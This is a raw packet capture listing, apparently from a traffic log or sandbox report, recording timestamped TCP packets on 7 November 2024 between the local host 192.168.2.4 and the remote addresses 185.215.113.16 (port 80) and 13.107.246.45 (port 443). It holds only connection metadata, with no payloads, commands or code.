Nov 7, 2024 07:33:32.065222979 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065232038 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065239906 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065241098 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065253973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065267086 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065270901 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065270901 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065279007 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065296888 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065299034 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065309048 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065319061 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065321922 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065321922 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065330029 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065339088 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065349102 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065355062 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065360069 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065373898 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065376997 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065385103 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065396070 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065396070 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065407991 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065427065 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065427065 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065439939 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065452099 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065458059 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065462112 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065474033 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065479994 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065485954 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065495968 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065500021 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065507889 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065512896 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065526009 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065541983 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065547943 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065547943 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065552950 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065567017 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065576077 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065576077 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065577984 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065588951 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065635920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066155910 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066168070 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066184998 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066200018 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066210032 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066212893 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066222906 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066229105 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066236019 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066242933 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066248894 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066260099 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066266060 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066271067 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066282988 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066287041 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066287041 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066296101 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066301107 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066308975 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066319942 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066329956 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066330910 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066342115 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066344023 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066354036 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066365957 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066379070 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066379070 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066385984 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066392899 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066404104 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066414118 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066416025 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066426039 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066436052 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.066456079 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066476107 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.066476107 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.068387032 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.068802118 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.069261074 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.069713116 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.070888996 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.070913076 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.071183920 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.071190119 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.080130100 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.080142975 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.080837965 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.080842018 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.081343889 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.081362963 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.081538916 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.081545115 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.082009077 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.082026005 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.082412004 CET	49938	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.082421064 CET	443	49938	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.094410896 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094441891 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094451904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094470978 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094511032 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094521999 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094523907 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094549894 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094568968 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094579935 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094597101 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094625950 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094635010 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094635963 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094647884 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094666958 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094691038 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094767094 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094835043 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094846010 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094877958 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094887018 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094897032 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094906092 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.094912052 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094947100 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.094947100 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.173907995 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.173932076 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.173943043 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174024105 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174024105 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174024105 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174035072 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174046040 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174084902 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174135923 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174146891 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174156904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174166918 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174209118 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174209118 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174263954 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174274921 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174284935 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174338102 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174338102 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174374104 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174385071 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174395084 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174405098 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174405098 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174416065 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174442053 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174472094 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174503088 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174511909 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174566984 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174576044 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174586058 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174597025 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174624920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174624920 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174638987 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174664974 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174674034 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174681902 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174691916 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174701929 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174707890 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174738884 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174817085 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174825907 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174837112 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174848080 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174861908 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174917936 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174928904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174942970 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.174945116 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174954891 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174966097 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.174966097 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175017118 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175017118 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175048113 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175059080 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175108910 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175120115 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175127029 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175128937 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175158024 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175215006 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175225019 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175271988 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175281048 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175297976 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175375938 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175386906 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175395966 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175400972 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175406933 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175421953 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175447941 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175458908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175472975 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175569057 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175571918 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175580978 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175590992 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175601959 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175611973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175614119 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175633907 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.175637007 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.175723076 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.195611000 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.195702076 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.198992968 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.207817078 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.208045006 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.208076000 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.208121061 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.208264112 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.208514929 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.209418058 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209429026 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209438086 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209485054 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.209496021 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.209496021 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.209517002 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.209604025 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209630013 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.209631920 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209760904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209784985 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.209817886 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209826946 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209836960 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209846973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209860086 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.209883928 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209887981 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.209887981 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.209897041 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209929943 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209945917 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.209949970 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.210057020 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.210067034 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.210083961 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.210562944 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.210628986 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.210697889 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.210707903 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.210714102 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.210726023 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.210738897 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.210752010 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.210763931 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.210798979 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.210798979 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.237525940 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.237535000 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.237564087 CET	49937	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.237571001 CET	443	49937	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.238246918 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.238250017 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.238270998 CET	49939	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.238274097 CET	443	49939	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.239947081 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.239954948 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.239984035 CET	49940	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.239989042 CET	443	49940	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.281259060 CET	49944	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.281280994 CET	443	49944	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.281440020 CET	49944	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.282509089 CET	49945	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.282562017 CET	443	49945	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.282685995 CET	49945	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.283704042 CET	49946	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.283711910 CET	443	49946	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.284022093 CET	49946	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.288305998 CET	49944	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:32.288315058 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.288319111 CET	443	49944	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.288341045 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.288371086 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.288402081 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289205074 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289231062 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289242029 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289282084 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289315939 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289324999 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289336920 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289375067 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289375067 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289412975 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289424896 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289433956 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289444923 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289455891 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289478064 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289535999 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289557934 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289611101 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289619923 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289633036 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289663076 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289674044 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289683104 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289686918 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289700031 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289747000 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289762020 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289768934 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289772987 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289791107 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289855003 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289870024 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289875031 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289880037 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289892912 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289897919 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.289968967 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289979935 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289989948 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.289994001 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.290007114 CET	49934	80	192.168.2.4	185.215.113.16
